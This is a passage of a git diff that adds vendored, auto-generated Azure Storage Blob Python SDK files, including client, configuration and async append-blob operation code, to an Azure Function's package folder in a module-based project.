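with AzureBlobStorage(url="https://myaccount.blob.core.windows.net") as client:  # placeholder URL
    request = HttpRequest("GET", "https://myaccount.blob.core.windows.net/?comp=list")
    response = client._send_request(request)  # no error handling is performed for you
    print(response.status_code)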
+# -------------------------------------------------------------------------- + +from typing import TYPE_CHECKING + +from azure.core.configuration import Configuration +from azure.core.pipeline import policies + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any + +VERSION = "unknown" + +class AzureBlobStorageConfiguration(Configuration): # pylint: disable=too-many-instance-attributes + """Configuration for AzureBlobStorage. + + Note that all parameters used to create this instance are saved as instance + attributes. + + :param url: The URL of the service account, container, or blob that is the target of the + desired operation. + :type url: str + :keyword version: Specifies the version of the operation to use for this request. Default value + is "2021-04-10". Note that overriding this default value may result in unsupported behavior. + :paramtype version: str + """ + + def __init__( + self, + url, # type: str + **kwargs # type: Any + ): + # type: (...) -> None + super(AzureBlobStorageConfiguration, self).__init__(**kwargs) + version = kwargs.pop('version', "2021-04-10") # type: str + + if url is None: + raise ValueError("Parameter 'url' must not be None.") + + self.url = url + self.version = version + kwargs.setdefault('sdk_moniker', 'azureblobstorage/{}'.format(VERSION)) + self._configure(**kwargs) + + def _configure( + self, + **kwargs # type: Any + ): + # type: (...) -> None + self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs) + self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs) + self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs) + self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs) + self.http_logging_policy = kwargs.get('http_logging_policy') or policies.HttpLoggingPolicy(**kwargs) + self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs) + self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs) + self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs) + self.authentication_policy = kwargs.get('authentication_policy') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_patch.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_patch.py new file mode 100644 index 0000000..584913a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_patch.py @@ -0,0 +1,31 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. 
+# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +# This file is used for handwritten extensions to the generated code. Example: +# https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/customize_code/how-to-patch-sdk-code.md +def patch_sdk(): + pass \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_vendor.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_vendor.py new file mode 100644 index 0000000..48c9335 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_vendor.py @@ -0,0 +1,27 @@ +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from azure.core.pipeline.transport import HttpRequest + +def _convert_request(request, files=None): + data = request.content if not files else None + request = HttpRequest(method=request.method, url=request.url, headers=request.headers, data=data) + if files: + request.set_formdata_body(files) + return request + +def _format_url_section(template, **kwargs): + components = template.split("/") + while components: + try: + return template.format(**kwargs) + except KeyError as key: + formatted_components = template.split("/") + components = [ + c for c in formatted_components if "{}".format(key.args[0]) not in c + ] + template = "/".join(components) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__init__.py new file mode 100644 index 0000000..689b3d3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__init__.py @@ -0,0 +1,15 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. 
+# -------------------------------------------------------------------------- + +from ._azure_blob_storage import AzureBlobStorage +__all__ = ['AzureBlobStorage'] + +# `._patch.py` is used for handwritten extensions to the generated code +# Example: https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/customize_code/how-to-patch-sdk-code.md +from ._patch import patch_sdk +patch_sdk() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..e839dbd Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_azure_blob_storage.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_azure_blob_storage.cpython-39.pyc new file mode 100644 index 0000000..d9837c7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_azure_blob_storage.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_configuration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_configuration.cpython-39.pyc new file mode 100644 index 0000000..a2a9b60 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_configuration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_patch.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_patch.cpython-39.pyc new file mode 100644 index 0000000..94d02f3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_patch.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_azure_blob_storage.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_azure_blob_storage.py new file mode 100644 index 0000000..65d075d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_azure_blob_storage.py @@ -0,0 +1,101 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. 
+# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from copy import deepcopy +from typing import Any, Awaitable + +from msrest import Deserializer, Serializer + +from azure.core import AsyncPipelineClient +from azure.core.rest import AsyncHttpResponse, HttpRequest + +from .. import models +from ._configuration import AzureBlobStorageConfiguration +from .operations import AppendBlobOperations, BlobOperations, BlockBlobOperations, ContainerOperations, PageBlobOperations, ServiceOperations + +class AzureBlobStorage: + """AzureBlobStorage. + + :ivar service: ServiceOperations operations + :vartype service: azure.storage.blob.aio.operations.ServiceOperations + :ivar container: ContainerOperations operations + :vartype container: azure.storage.blob.aio.operations.ContainerOperations + :ivar blob: BlobOperations operations + :vartype blob: azure.storage.blob.aio.operations.BlobOperations + :ivar page_blob: PageBlobOperations operations + :vartype page_blob: azure.storage.blob.aio.operations.PageBlobOperations + :ivar append_blob: AppendBlobOperations operations + :vartype append_blob: azure.storage.blob.aio.operations.AppendBlobOperations + :ivar block_blob: BlockBlobOperations operations + :vartype block_blob: azure.storage.blob.aio.operations.BlockBlobOperations + :param url: The URL of the service account, container, or blob that is the target of the + desired operation. + :type url: str + :param base_url: Service URL. Default value is "". + :type base_url: str + :keyword version: Specifies the version of the operation to use for this request. Default value + is "2021-04-10". Note that overriding this default value may result in unsupported behavior. + :paramtype version: str + """ + + def __init__( + self, + url: str, + base_url: str = "", + **kwargs: Any + ) -> None: + self._config = AzureBlobStorageConfiguration(url=url, **kwargs) + self._client = AsyncPipelineClient(base_url=base_url, config=self._config, **kwargs) + + client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)} + self._serialize = Serializer(client_models) + self._deserialize = Deserializer(client_models) + self._serialize.client_side_validation = False + self.service = ServiceOperations(self._client, self._config, self._serialize, self._deserialize) + self.container = ContainerOperations(self._client, self._config, self._serialize, self._deserialize) + self.blob = BlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.page_blob = PageBlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.append_blob = AppendBlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.block_blob = BlockBlobOperations(self._client, self._config, self._serialize, self._deserialize) + + + def _send_request( + self, + request: HttpRequest, + **kwargs: Any + ) -> Awaitable[AsyncHttpResponse]: + """Runs the network request through the client's chained policies. + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest("GET", "https://www.example.org/") + + >>> response = await client._send_request(request) + + + For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart + + :param request: The network request you want to make. Required. + :type request: ~azure.core.rest.HttpRequest + :keyword bool stream: Whether the response payload will be streamed. Defaults to False. 
+ :return: The response of your network call. Does not do error handling on your response. + :rtype: ~azure.core.rest.AsyncHttpResponse + """ + + request_copy = deepcopy(request) + request_copy.url = self._client.format_url(request_copy.url) + return self._client.send_request(request_copy, **kwargs) + + async def close(self) -> None: + await self._client.close() + + async def __aenter__(self) -> "AzureBlobStorage": + await self._client.__aenter__() + return self + + async def __aexit__(self, *exc_details) -> None: + await self._client.__aexit__(*exc_details) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_configuration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_configuration.py new file mode 100644 index 0000000..51ca1cf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_configuration.py @@ -0,0 +1,58 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from typing import Any + +from azure.core.configuration import Configuration +from azure.core.pipeline import policies + +VERSION = "unknown" + +class AzureBlobStorageConfiguration(Configuration): # pylint: disable=too-many-instance-attributes + """Configuration for AzureBlobStorage. + + Note that all parameters used to create this instance are saved as instance + attributes. + + :param url: The URL of the service account, container, or blob that is the target of the + desired operation. + :type url: str + :keyword version: Specifies the version of the operation to use for this request. Default value + is "2021-04-10". Note that overriding this default value may result in unsupported behavior. 
+ :paramtype version: str + """ + + def __init__( + self, + url: str, + **kwargs: Any + ) -> None: + super(AzureBlobStorageConfiguration, self).__init__(**kwargs) + version = kwargs.pop('version', "2021-04-10") # type: str + + if url is None: + raise ValueError("Parameter 'url' must not be None.") + + self.url = url + self.version = version + kwargs.setdefault('sdk_moniker', 'azureblobstorage/{}'.format(VERSION)) + self._configure(**kwargs) + + def _configure( + self, + **kwargs: Any + ) -> None: + self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs) + self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs) + self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs) + self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs) + self.http_logging_policy = kwargs.get('http_logging_policy') or policies.HttpLoggingPolicy(**kwargs) + self.retry_policy = kwargs.get('retry_policy') or policies.AsyncRetryPolicy(**kwargs) + self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs) + self.redirect_policy = kwargs.get('redirect_policy') or policies.AsyncRedirectPolicy(**kwargs) + self.authentication_policy = kwargs.get('authentication_policy') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_patch.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_patch.py new file mode 100644 index 0000000..584913a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_patch.py @@ -0,0 +1,31 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +# This file is used for handwritten extensions to the generated code. 
Example: +# https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/customize_code/how-to-patch-sdk-code.md +def patch_sdk(): + pass \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__init__.py new file mode 100644 index 0000000..dfe59c6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__init__.py @@ -0,0 +1,23 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from ._service_operations import ServiceOperations +from ._container_operations import ContainerOperations +from ._blob_operations import BlobOperations +from ._page_blob_operations import PageBlobOperations +from ._append_blob_operations import AppendBlobOperations +from ._block_blob_operations import BlockBlobOperations + +__all__ = [ + 'ServiceOperations', + 'ContainerOperations', + 'BlobOperations', + 'PageBlobOperations', + 'AppendBlobOperations', + 'BlockBlobOperations', +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..e3ffaa3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_append_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_append_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..b6f98ea Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_append_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..146a0a2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_blob_operations.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_block_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_block_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..4261e5e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_block_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_container_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_container_operations.cpython-39.pyc new file mode 100644 index 0000000..3af028d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_container_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_page_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_page_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..9589053 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_page_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_service_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_service_operations.cpython-39.pyc new file mode 100644 index 0000000..fcaa484 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/_service_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_append_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_append_blob_operations.py new file mode 100644 index 0000000..b9da858 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_append_blob_operations.py @@ -0,0 +1,677 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. 
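The append-blob operation group defined in the file that follows is never instantiated directly (its class docstring repeats the warning); callers reach it through the public client. A hedged sketch of the corresponding public wrappers — illustrative only, with placeholder account, container, and blob names:

import asyncio

from azure.storage.blob.aio import BlobClient

async def append_lines() -> None:
    blob = BlobClient(
        account_url="https://<account>.blob.core.windows.net",  # placeholder
        container_name="logs",                                  # placeholder
        blob_name="app.log",                                    # placeholder
        credential="<account-key>",                             # placeholder
    )
    async with blob:
        # Wraps AppendBlobOperations.create (sends x-ms-blob-type: AppendBlob).
        await blob.create_append_blob()
        # Wraps AppendBlobOperations.append_block (comp=appendblock); each
        # call commits one block to the end of the blob.
        await blob.append_block(b"first line\n")

asyncio.run(append_lines())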
+# -------------------------------------------------------------------------- +import datetime +from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... import models as _models +from ..._vendor import _convert_request +from ...operations._append_blob_operations import build_append_block_from_url_request, build_append_block_request, build_create_request, build_seal_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class AppendBlobOperations: + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`append_blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def create( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + request_id_parameter: Optional[str] = None, + blob_tags_string: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Create Append Blob operation creates a new append blob. + + :param content_length: The length of the request. + :type content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. 
Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "AppendBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "AppendBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = 
modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_create_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + timeout=timeout, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}/{blob}"} # type: 